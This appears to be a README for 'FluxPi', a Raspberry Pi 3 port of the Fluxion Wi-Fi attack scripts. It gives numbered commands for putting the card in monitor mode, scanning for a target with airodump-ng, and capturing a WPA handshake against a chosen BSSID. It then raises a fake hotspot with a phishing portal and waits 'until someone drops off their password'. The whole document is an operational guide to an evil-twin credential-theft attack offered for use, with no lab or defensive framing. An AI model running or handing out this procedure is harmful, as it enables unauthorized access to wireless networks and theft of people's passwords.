All scripts are made by FLUXION team.
I only modified the scripts so people with Raspberry Pi 3 with nexmon drivers from re4son kernel (google re4son kernel for rpi).

Future:
Everything will be combined in one script.
Terminal UI
Generic Page Languages
Custom Pages

NOTES:
At the moment FluxPi is using fluxion's generic page in Serbian language.
If you wish to add new languages please do so, i'll work on english page as soon as i can.
This was tested on Raspberry Pi 3 - Raspbian Stretch with Desktop.
Ignore error messages about non existing files and/or folders.
Make sure you don't delete dump-01.cap file before you successfully crack the key.
If i forgot to add any dependencies in the installer script, be kind and post an issue


How to use:
0. First run install.sh to get xterm, hostapd, lighttpd, mdk3, aircrack-ng and isc-dhcp-server


1. Enable nexmon drivers:
sudo /usr/local/src/re4son*/install.sh -x

2. Switch to monitor mode:
nexutil -m1
(You need to use -m1 and not -m2)

3. Do a scan with airodump-ng and find a target:
sudo airodump-ng wlan0
(Write down ssid, bssid and channel of your target)

4. Run HandshakePi.sh with two arguments - bssid and channel:
sudo ./HandshakePi.sh xx:xx:xx:xx:xx 6

5. Continue only after you get a message saying .cap files are valid

6. Disable nexmon drivers and revert back to original drivers because those drivers don't support AP mode:
sudo /usr/local/src/re4son*/install.sh -o

7. Use fluxPi.sh also with two arguments, this time ssid and channel:
sudo ./fluxPi.sh HOTSPOT 6

8. Wait until someone drops off their password, script will automaticlly shutdown everything and leave a terminal with aircrack-ng information.

Unfortunately you can't use mdk3 or aircrack-ng while hotspot is enabled because, as i said, nexmon drivers are for monitor mode, original drivers are for AP mode.

// dnsmasq.conf
except-interface=wlan0
bind-interfaces



All copyrights if there are any for fluxion, nexmon or re4son are their owns.
I didn't create any of them, i just used and/or modified them to my needs.
